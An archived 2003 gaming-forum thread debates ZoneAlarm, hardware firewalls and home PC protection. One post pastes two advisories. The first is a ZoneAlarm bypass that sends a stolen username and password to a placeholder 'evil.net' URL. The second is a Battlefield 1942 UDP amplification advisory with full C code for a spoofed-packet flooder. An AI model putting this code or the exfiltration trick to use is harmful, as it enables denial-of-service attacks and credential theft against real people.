PDA

View Full Version : Get Protection

whifix
12-08-03, 21:17
With all of these 3rd party password stealing programs coming out I feel the need to inform people of tools against these. Most of them are free.

Norton/McAfee/Whatever (AntiVirus Software, usually $20-$50)

Get a good antivirus software. Go get it now! Why are you sitting there???? GOGOGOGO!

Zone Alarm (Free Version)
http://www.zonelabs.com/store/content/company/products/znalm/freeDownload.jsp?lid=zadb_zadown

Zone Alarm is awesome. It will let you know when a program, like something trying to steal your password and send it to someone else over the internet, is trying to access the internet. It will let you know when anything is trying to access the internet for that matter which is a good thing and a bad one. Most importantly it will keep you safe.

Ad-Ware (Free Version
http://www.lavasoftusa.com/support/download/

Besides MMORG's there are other apps out there that will watch you and send your information across the internet to third parties. Ad-Aware is one of the strongest scanning tools for this type of evil code.

Windows Update
http://windowsupdate.microsoft.com

Run it often, at least once a week. Windows tends to come out with a big hole every 6months that can allow people to mess up your life by gimping/hijacking/killing your machine. So make sure you get the fix for it ASAP at windowsupdate.microsoft.com.

Hayato
12-08-03, 21:20
Or why dont they just not use the 3rd party progs :D

whifix
12-08-03, 21:30
Sometimes the third party apps are really helpfull. Such as Skill-Manager by Kordor. It may not be exact but it allows you to see where you can distribute points and get a basic configuration to aim for.

d3ik
12-08-03, 21:30
*cough* easynews *cough*

cshank2
12-08-03, 21:31
Originally posted by Hayato
Or why dont they just not use the 3rd party progs :D

I just put a condom on my modem does that help? :(

Okay ya dont use 3rd party progs in the first place n00bs

Phiberdelic
12-08-03, 21:52
Ummm...Please stop infecting everyone with lies that ZoneAlarm does any good, it doen't. As a Network Admin, I have seen more than enough hacked computers due to the false security that ZoneAlarm portrays. Heres a good website for those of you who want to know about all the exploits for ZoneAlarm or other so called protected programs http://packetstormsecurity.org/

FYI: ZoneAlarm will only attempt to protect you from yourself and low level 1 attacks. Buy a hardware firewall, or if you must purchase Norton Firewall and maintain updates

CryptoChronic
12-08-03, 22:03
phiber is right... zonealarm sucks bigtime... i installed it once, learned how much it blew.. and uninstalled it and it screwed my comp up and had to reformat

msdong
12-08-03, 22:05
[[I'd suggest rereading the rules]]

Promethius
12-08-03, 23:10
damn i already got all those progs...

Richard Adregen
12-08-03, 23:14
Try Antivir, it's a good, free AV guard, if you need one.

http://www.free-av.com

RA.

Promethius
12-08-03, 23:16
Originally posted by Phiberdelic
Ummm...Please stop infecting everyone with lies that ZoneAlarm does any good, it doen't. As a Network Admin, I have seen more than enough hacked computers due to the false security that ZoneAlarm portrays. Heres a good website for those of you who want to know about all the exploits for ZoneAlarm or other so called protected programs http://packetstormsecurity.org/

FYI: ZoneAlarm will only attempt to protect you from yourself and low level 1 attacks. Buy a hardware firewall, or if you must purchase Norton Firewall and maintain updates

So wat firewall do you use?

whifix
13-08-03, 00:21

In all my years the only problems I've seen with zone alarm is one computer that had problems with it installed. A update to a newer version fixed that. There are exploits out for it but only ones that will cause it to use 100% of the processor which a patch came out for right away.

What do you mean by level 1 attacks? WTF is that? Port scans? Buffer overruns on the SMB or RPC services? Zone Alarm does a good job blocking access to ports on a machine. Thats what a firewall does. Zone alarm also goes the extra step and tells you what is trying to access the internet and allows you to chose if you want to allow it to or not.

Norton Personal Firewall is a nice product. So is Blackice and McAfee Personal Firewall. Nice if you have a spare $20-50 bucks. If your price range is free (excluding Kazaa usage) Zone Alarm works. Don't just ride the internet bare azs. hehe

KnightWalker
13-08-03, 01:04
The Free version of ZA has some holes in it as described by packetstorm, the pro version does not as its build from a completely different codebase (see packetstorm also) and is much faster. A combination of NAT router and decent personal firewall software such as ZA pro or Norton or Outpost is about the best you can hope for on a home PC. Putting in £25K Cisco firewalls on a home network is a little excessive.
Never install a firewall or antivirus program that was downloaded from a 'file sharing' source such as Kazaa, its more than likely to have been cracked to have a backdoor or trojan in it.

KW

Sorin
13-08-03, 01:36
ACK! :lol: You mean you want me to actually legitimately BUY something instead [[I suggest you read the rules also]]:( :angel: Damn, time to put the add/remove programs function to work :D

whifix
13-08-03, 02:11
Originally posted by KnightWalker
The Free version of ZA has some holes in it as described by packetstorm, the pro version does not as its build from a completely different codebase (see packetstorm also) and is much faster. A combination of NAT router and decent personal firewall software such as ZA pro or Norton or Outpost is about the best you can hope for on a home PC. Putting in £25K Cisco firewalls on a home network is a little excessive.
Never install a firewall or antivirus program that was downloaded from a 'file sharing' source such as Kazaa, its more than likely to have been cracked to have a backdoor or trojan in it.

KW

I think you might be mistaken. Zone Alarm and Zone Alarm Pro are cut from the same code. Why else would Zone Alarm have a unlock feature to enable Zone Alarm Pro? Wher in Packet Storm does it say that verion 4 of Zone Alarm is bugged? There are also linksys, netgear, cisco and watch guard hardware based firewalls that range from $40-$500.

Devils Thrill
13-08-03, 02:48
why u dont like ZA, its the best outbound firewall there is, so what if there are a few holes in it, its alot better than no firewall.

it stop the msblast worm from spreading to other computers on my network, and im sure my isp was grateful for that.

KnightWalker
13-08-03, 21:38
Originally posted by whifix
I think you might be mistaken. Zone Alarm and Zone Alarm Pro are cut from the same code. Why else would Zone Alarm have a unlock feature to enable Zone Alarm Pro? Wher in Packet Storm does it say that verion 4 of Zone Alarm is bugged? There are also linksys, netgear, cisco and watch guard hardware based firewalls that range from $40-$500.

Quite possibly i am mistaken, but last time i checked the free version of ZA was version 3, and if you upgrade it downloads ZA 4. 4 and 3 are different code bases. I did the upgrade from 3 to 4 and have not checked what the free version is since, so am not certain. I guess a $40 firewall will only do NAT rather than packet inspection, a $500 firewall may have some packet inspection in it. But as I said, NAT and a personal firewall are fine for home use.

whifix
13-08-03, 22:39
My mistake. The free version is currently at version 3.7.202.0 and was release on 7-22-03. There are no eploits for it and would loved to be shown otherwise(then I'd have to default to another firewall software). Last exploite I know of for Zone Alarm was released on 10-02 for versions 3.0.* and 3.1.* and was a denial of service attack on Zone Alarm that was rarely reporduced. Most modern firewall software including Norton, McAfee and Zone Alarm Pro runs some form of stateful packet inspection which should do as good of a job as your average $3K+ pix firewalls(not to mention that software based firewalls were the first to protect against fragmented packet attacks that most hardware based solutions took took forever to protect against) Bottom line is a firewall is only as good as the user who sets it up. I dont like sounding like a zone alarm rep but it is freakend awesome. With a tutorial of how to use it, program update notifications and emails notifying you of bug fixes/updates/security warnings even the least tech savy person can set it up to do a good job.

Phiberdelic
13-08-03, 23:27
WOW, such flame bait I posted...Man, talk bad about someones precious little ZoneAlarm and ppl get huffy, and start talking like they actually know something. I think its pathetic really. But anyways heres some articles for whifit who said there haven't been anything since last year and 40mil versions ago. I feel like i said something bad about AOL, god forbid. But anyways who gives a shit, if you feel safe then more power to you.

PS> for whoever asked, I run WinXp w/ Signal9 Conseal Firewall(man doin 1372 rulesets took forever) ontop of Redhat 8.2 using ipchains ontop of a hardware firewall (Webramp 700s), so I'm feeling pretty tingly inside.

ZoneAlarm Pro 4.0 May Drop Some Firewall Rules When Upgrading From a Previous Version
Jul 12 2003, 12:12 (UTC+0)
A security issue was reported in ZoneAlarm Pro 4.0. Some of the connection blocking features are not supported in the new version, counter to what the documentation may imply. Users that are upgrading may find that certain firewall rules have been silently dropped during the conversion. The ZoneAlarm Pro manual indicates that "port rules for Programs" from a previous version of the software will be automatically converted to "expert rules" when upgrading to version 4.0. However, it is reported that some rules will not be converted because the new version does not support them. http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?database=JanBB%2edb&command=viewone&id=10&op=t

Hi everyone.
I don't know if this is a new issue but it is a simple way to
bypass (in some limited form) ZoneAlarm's Application level
Internet access blocking.

Windows dll shell32.dll exports a well known and documented function called
ShellExecute. From Win32 Programmer's refference:

>HINSTANCE ShellExecute(
> HWND hwnd, // handle to parent window
> LPCTSTR lpOperation, // pointer to string that specifies
> // operation to perform
> LPCTSTR lpFile, // pointer to filename or folder name string
> LPCTSTR lpParameters, // pointer to string that specifies
> //executable-file parameters
> LPCTSTR lpDirectory, // pointer to string that specifies default
directory
> INT nShowCmd // whether file is shown when opened
> );

When the lpFile parameter is an Internet url, windows invokes Internet
Explorer (or more accurately - the default web browser), which in 99% of
the cases is allowed to access Internet, with that url. Example:

ShellExecute(
"open",
"http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"
SW_HIDE //This doesn't work.
//I think it is supposed to hide the window but ...
);

The collect.cgi (after storing stolen_username/stolen_password) could
redirect the user for example to
windowsupdate.microsoft.com,
so that many users will not even suspect anything.

The info leaked is limited by the maximum allowed url length, but that
could be more than enough for a malicious application to send some
username/password/cookie/cc_number info to malicious server.

This was tested on ZoneAlarm 4.0.156 (freeware) but i guess that all
versions can be tricked if the user has granted access to his default
web browser by default (very likely)

VENDOR STATUS:
I thing that this is flaw in the core design of ZoneAlarm
(and/or Windows) and don't see a way it can be fixed.

WORKAROUND:
Do not allow ANY application to access Internet by default and
review each request separately.

Multi-Vendor Game Server DDoS Advisory
Jun, 23 2003 - 08:24
contributed by: hx
Summary
This document is based on Battlefield 1942's query responses, but this vulnerability exists in many games. As a basic rule of thumb, if it supports GameSpy (http://www.gamespy.com), it will likely be vulnerable.
The below listed games are vulnerable to the same type of attack, and most use the same general query commands (excluding Quake, Quake 2, Return to Castle Wolfenstein, and a couple others). The other query commands can be found in the source of a free program called "Server Query" (http://www.ServerQuery.com). The general rule of thumb is: If it's supported by GameSpy and Server Query, it's vulnerable.

Details
Affected Games:
* Quake Quake 2 Q3: Arena & Team Arena
* Kingpin Half-Life Counter-Strike
* Sin Soldier of Fortune Daikatana
* Unreal Tourn. Quakeworld Unreal
* Rune Gore Tribes
* Tribes 2 - Serious Sam Serious Sam 2
* C&C: Renegade Global Operations Jedi Knight 2
* Battlefield 1942
* America's Army
* Unreal Tournament 2003
* Return to Castle Wolfenstein
* Medal of Honour: Allied Assault
* SoF2: Double Helix
* SoF2: Double Helix Demo
* Alien vs Predator 2
* NeverWinter Nights
* V8 Supercar Challenge

Technical details:
Battlefield 1942 is given as an example. The other games' vulnerabilities are similar.

The risk for this vulnerability seems to be worse on a game such as Battlefield 1942 due to its ability for to support 64 player servers.

Battlefield 1942 servers listen on UDP port 23000, awaiting such commands as: '\status\' '\players\' '\packets\' '\echo\' '\rules\', and more.

The server uses a protocol very similar to UT2003 and America's Army, and many other GameSpy* supported games (* Gamespy is a popular program that allows game clients to find and connect to game servers).

BF1942 allows you to combine requests into something of the sorts of: '\status\players\packets\rules\'.

When a request like the example above is sent, it uses approximately 30 bytes, not including UDP overhead. The resulting response can be anywhere from as low as 6000 - 7000, to as high as 11,000+ bytes.

The example of 30 bytes creates a 11,799 bytes response, therefore we get a ratio of 1:393. Basically, for every 1 byte we've send, 393 are returned (in this particular example, which comes from a server housing 41 players. Results will vary). A server which holds 64 players could potentially respond with well over 18,000 bytes for each such request.

Side note, one single UDP request using the query line in Mike's proof of concept code is responded with 10 separate responses (due to packet size limitations). This also means, that if the victim port is unreachable, the victim will respond to the data with 10 ICMP Unreachable packets.

Vulnerability:
UDP is a connectionless protocol of which the source IP and port can easily be spoofed. If you've read the introduction, you can probably see where Mike is going with this.

The BF1942 status port will reply with an amazing amount of requests, and although Mike has only personally tested this to 50 Kbytes/sec, but does not see any reason why you couldn't go even higher.

When these requests are received, the reply is sent to the source host which, in this case, we have spoofed. This causes a huge packet flood to your victim.

When tested, a single upstream of 4 k/s to the BF1942 server yielded over 550 k/s being sent to the victim host. When the victim's host receives these packets on a UDP port which is open (commonly found to be 135 (MS/DCE RPC), 53 (DNS), and so on), the downstream to that connection will be flooded. If it is sent to an unreachable port on the victim's host, the victim's stack will respond with "Unreachable" response which will also flood their upstream.

A personal firewall such as ZoneAlarm will not prevent this type of DoS, as it is simply a flood of information being sent directly to the victim's computer. To stop these DoSs from reaching the victim, the port you specify would have to be blocked before reaching their system. Ports you would find particularly useless would be ones that are commonly blocked by ISPs before reaching the customers: 139/NetBIOS, and so on. A firewall will only prevent the victim from responding with ICMP Unreachable packets.

Further information, discussion:
This is an attack that can easily flood any system slower than the Battlefield 1942 server. Further this attack can be done anonymously due to the fact that the UDP packet source is spoofed to that of the victim. This is very similar to the "smurf" attack that was used in the past.

The attack does not only affect the bandwidth of the host and the victim, but it also tends to eat up a nice chunk of memory and CPU power on the server.

This low amount of required upstream would allow a simple modem user to send a hefty DoS to a T1 or higher.

Due to the fact that Battlefield 1942 servers tend to require a lot of bandwidth to operate, you are very likely to find that nearly any server will have more than enough bandwidth to handle the task. EA has many of their servers hosted on OC3 lines.

In many ways, this exceeds the severity of the smurf attack method.

Example theory of risk:
T1 (1.54 mbps) FULL DoS:
* 1 server needed @ ~220 k/s or more (a 20 player server will do).
* 1 - 2 k/s* upstream needed from attacker (~14.4 baud modem)
* A single user dialed up at 14,400 bps can topple a T1.
* A single dial-up at 56k (31.2kbit up) could DoS 2 T1s at a time.

* You must account for UDP overhead (IP Header, UDP Header)

Proof-of-concept code:
Proof of concept code was created to show severity of this vulnerability. Please use it with caution (http://www.pivx.com/kristovich/poc/bf1942dos.c):

/************************************************************************/
/* Battlefield 1942 - All Versions flooder (proof-of-concept) */
/* by Mike Kristovich (mkristovich@pivx.com) */
/* */
/* Filename: bf1942dos.c */
/* Location: http://www.pivx.com/kristovich/poc/bf1942dos.c */
/* */
/* Proof-of-concept code for PivX Security Advisory MK#001 */
/* */
/* Linux version (MK-POC-001/1.0) */
/* */
/* Description of code: */
/* This exploit will spoof UDP packets from a source which you */
/* specify, to a Battlefield 1942 server. The server will send */
/* packets to the victim, regardless of victim status. */
/* */
/* */
/* This source has been tested and compiled on Linux. */
/* This source is covered by the GNU GPL. */
/* Thanks to Luigi for assistance with the code! */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <string.h>

#define IPSZ sizeof(struct iphdr)
#define UDPSZ sizeof(struct udphdr)
#define DATASZ sizeof(STRING) - 1
#define PSEUDOSZ sizeof(struct pseudohdr)
#define BUFFSZ 100
#define SIZE (IPSZ + UDPSZ + DATASZ)
#define STRING "\\players\\status\\packets\\rules\\"
#define SRCPORT 1204
#define DSTPORT 230

u_short in_cksum(unsigned short *addr, int len);
u_long resolv(char *host);
void std_err(void);

struct pseudohdr {
u_int32_t saddr;
u_int32_t daddr;
u_int8_t zero;
u_int8_t protocol;
u_int16_t length;
} *pseudohdr;

int main(int argc, char *argv[]) {

u_char buff[BUFFSZ],
pseudobuff[BUFFSZ],
*data;
struct sockaddr_in peer;
struct iphdr *iphdr;
struct udphdr *udphdr;
int shandle,
err;
u_int32_t source,
dest;
u_int16_t sport,
dport;

int packetsent;
int maxpackets;
int pktdoubler;
int bandwidth;

printf("\r\n---------------------------------------------------\r\n");
printf(" Game Server DoS - Proof-of-Concept\r\n");
printf(" by Mike Kristovich, PivX Security Researcher\r\n");
printf("= http://www.PivX.com : : mkristovich@pivx.com =\r\n");
printf("---------------------------------------------------\r\n");
printf("= Advisory MK#001 : : Battlefield 1942 DoS =\r\n");
printf("---------------------------------------------------\r\n");

setbuf(stdout, NULL);

if(argc < 4)
{
fprintf(stderr,"Usage: %s <IP_to_flood> <Server_IP> <kBps_to_use> <#_packets>\r\n",*argv);
printf(":: Options :: <victim_port[default 53]> <server_port[default 23000]>\r\n");
exit(1);
};

source = resolv(argv[1]);
dest = resolv(argv[2]);

if (!argv[6])
dport = DSTPORT;
else
dport = atoi(argv[6]);

if (!argv[5])
sport = SRCPORT;
else
sport = atoi(argv[5]);

printf("Sending packets to server ...");

peer.sin_addr.s_addr = dest;
peer.sin_port = htons(dport);
peer.sin_family = AF_INET;

iphdr = (struct iphdr *)buff;
udphdr = (struct udphdr *)(buff + IPSZ);
data = (u_char *)(buff + IPSZ + UDPSZ);
pseudohdr = (struct pseudohdr *)pseudobuff;

/* build data */
memcpy(data, STRING, DATASZ);

/* build IP header */
iphdr->ihl = 5;
iphdr->version = 4;
iphdr->tos = 0x8;
iphdr->tot_len = SIZE;
iphdr->id = 156;
iphdr->frag_off = 0;
iphdr->ttl = 128;
iphdr->protocol = IPPROTO_UDP;
iphdr->check = 0;
iphdr->saddr = source;
iphdr->daddr = dest;

/* build UDP header */
udphdr->source = htons(sport);
udphdr->dest = htons(dport);
udphdr->check = 0;
udphdr->len = htons(UDPSZ + DATASZ);

/* build pseudo header for calculate checksum (copy UDP header and data in it) */
memcpy(pseudobuff + PSEUDOSZ, buff + IPSZ, UDPSZ + DATASZ);

pseudohdr->saddr = iphdr->saddr;
pseudohdr->daddr = iphdr->daddr;
pseudohdr->zero = 0;
pseudohdr->protocol = IPPROTO_UDP;
pseudohdr->length = udphdr->len;

udphdr->check = in_cksum((u_short *)pseudobuff, PSEUDOSZ + UDPSZ + DATASZ);

/* send all */
shandle = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(shandle < 0) std_err();

/* do kbps handling */

/* set up max packets */
maxpackets = atoi(argv[4]);
/* set up packet-doubler bandwidth management */
bandwidth = atoi(argv[3]);

for (packetsent = 0; packetsent < maxpackets; packetsent++) {

for (pktdoubler = 0; pktdoubler < bandwidth; pktdoubler++) {
err = sendto(shandle, buff, SIZE, 0, (struct sockaddr *)&peer, sizeof(peer));
if(err < 0) std_err();
packetsent++;
};
usleep(24000);

};

printf("\r\nSpoofed packets sent to Battlefield 1942 server.\r\n");
close(shandle);

return(0);
}

u_short in_cksum(unsigned short *addr, int len) {
int sum = 0;
u_short answer = 0;
register u_short *w = addr;
register int nleft = len;

while(nleft > 1) {
sum += *w++;
nleft -= 2;
}
if(nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(hp == 0) std_err();
else host_ip = *(u_long *)(hp->h_addr);
}

return(host_ip);
}

void std_err(void) {
perror("\nError");
exit(1);
}

Fix:
* No fix is currently available from EA.
* No fix is currently available from other vendors.
* No fix currently, but a fix is planned from GameSpy.

Kugero
13-08-03, 23:37
Cisco PIX 501 firewall runs the same, full IOS set as it's larger cousins and sells for ~$450. IMO is quite possibly the best hardware firewall (considering all the features you get like 3DES VPN encryption, SPI, Syslog, etc.) you can purchase for a SOHO environment.

Having stated my preference, I would recommend that before you purchase or install any firewall you spend a little time researching the product. Some products don't always do what the vendor claims it can handle and others are notorious for causing more problems then preventing.

A good firewall is a combination of hardware, software and configuration. Great security is a combination of best effort firewalling, anti-virus, keeping your OS patched and common-sense (ie social engineering preventitives).

whifix
14-08-03, 03:22
Phiberdelic. Did you run a search on bugtraq or google and look up the keyword "Zone Alarm"?

I'll make the cliff notes version of the book your wrote;

"PS> for whoever asked, I run WinXp w/ Signal9 Conseal Firewall(man doin 1372 rulesets took forever) ontop of Redhat 8.2 using ipchains ontop of a hardware firewall (Webramp 700s)"
-What is Signal9(is it this http://signalsorry.mcafee.com/"? Why ipchains instead of IP tables? RedHat has a version 8.0. Did you mean 7.2? Webramp 700. NICE. Where does the linux box fit in though?

"I don't know if this is a new issue but it is a simple way to
bypass..."
-If internet explorer executes the code and ZoneAlarm allows IE to access the internet is it ZoneAlarms fault or IE? Plus where are they getting freeware version 4.0.156 from? The freeware version is only up to 3.7.202.0.

"Multi-Vendor Game Server DDoS Advisory"
-"A personal firewall such as ZoneAlarm will not prevent this type of DoS." woohoo! go zone alarm

Don't get me wrong I love solutions like hardware based firewalls coupled with IDS systems, honeypots, packet filtering, packet randomization and putting condoms on our modems but alot of people see that and think it's Greek. If your price is zero and your don't want to care about security like 90% of the internet then zone alarm is the best free solution money can buy.

PS> Cisco Pix 501 is good but I like the watch guard firewalls better.

Phiberdelic
14-08-03, 17:17
Ummm, ok this is starting to get into a pissing match. You like ZoneAlarm, good for you. You think its safe, well great, gimmie your IP address and let me test out your theory.

Redhat is up to version 9, man, you need to follow up on the times, which reminds me, I need to download this vers. http://www.redhat.com/software/linux/professional/

Signal9 (www.signal9.com) was bought out by McAfee a few years back, and they took Conseal FW and stripped it down, made it idiot friendly while removeing good security policy, re-packaged the thing to make lotsa money. I still have a copy of ConsealFW for those of you who might want to look at it, not giving away my key though, you'll have to find that yourself.

Why do I use ipchains rather that iptables, they do the same thing, they both filter using chains of rules, with slight differences between the two. Iptables are a little stricter on the ordering, whereas ipchains doesn't matter if protocol or source came first. I suppose Iptables might be easier cuz your filters go through one chain rather than multiple chains, stickler for the old ways I guess. I'll have to look into them and see if there is truely a significant difference to make me change.

Kugero
14-08-03, 17:36
Anybody got any experience with Outpost? I was beta testing it a while back, got tired of it crashing my OS and haven't looked into it since ...

btw for those hardare junkies with some *nix experience check out http://www.coyotelinux.com for a great hardened distro that you can run off a floppy or CD ...

I like it cause it config's similar to a PIX :)

whifix
14-08-03, 21:47
Ummm, ok this is starting to get into a pissing match. You like ZoneAlarm, good for you. You think its safe, well great, gimmie your IP address and let me test out your theory.

Redhat is up to version 9, man, you need to follow up on the times, which reminds me, I need to download this vers. http://www.redhat.com/software/linux/professional/

Signal9 (www.signal9.com) was bought out by McAfee a few years back, and they took Conseal FW and stripped it down, made it idiot friendly while removeing good security policy, re-packaged the thing to make lotsa money. I still have a copy of ConsealFW for those of you who might want to look at it, not giving away my key though, you'll have to find that yourself.

Why do I use ipchains rather that iptables, they do the same thing, they both filter using chains of rules, with slight differences between the two. Iptables are a little stricter on the ordering, whereas ipchains doesn't matter if protocol or source came first. I suppose Iptables might be easier cuz your filters go through one chain rather than multiple chains, stickler for the old ways I guess. I'll have to look into them and see if there is truely a significant difference to make me change.

I know Redhat is up to Redhat 9. You said you used redhat 8.2 which does not exist. Sorry if this has turned into a pissing contest that's not what i wanted. Generally it's a preferance thing thats why I wanted to know why you went IPCHAINS over IPTABLES but sometimes people know things that i dont about them, thats why i asked. IMO, i would thing if you went IPTABLES over chains you could of saved yourself some trouble over the 1372 rulesets. I'm not trying to make it a pissing match and please if you have any gripes take it up with me in PM. Alls I've been saying is if people think they have to be unprotected on the internet because they can't afford a good firewall then they are incorrect because zonealarm is free. If you have a better suggestion for it I'd love to hear it.

Edited

BramTops
14-08-03, 21:55
quick side-note:

Anti-virus software / Anti-spy ware software / windows update

do NOT

protect you against custom build spy/pw steal programs coz of the simple fact that these programs dont detect a custom build spy program (e.g. one specificly build for neocron).

a firewall can stop some things, but there are easy workarrounds..

still.. there are 100% safe 3rd-party programs (see signature ;) its tested and approved by KK!) - (yeah... can't stop to spam too! :D)

Delloda
14-08-03, 22:08
Mind overload...toooo muuuchh techno-gibberish.....

:(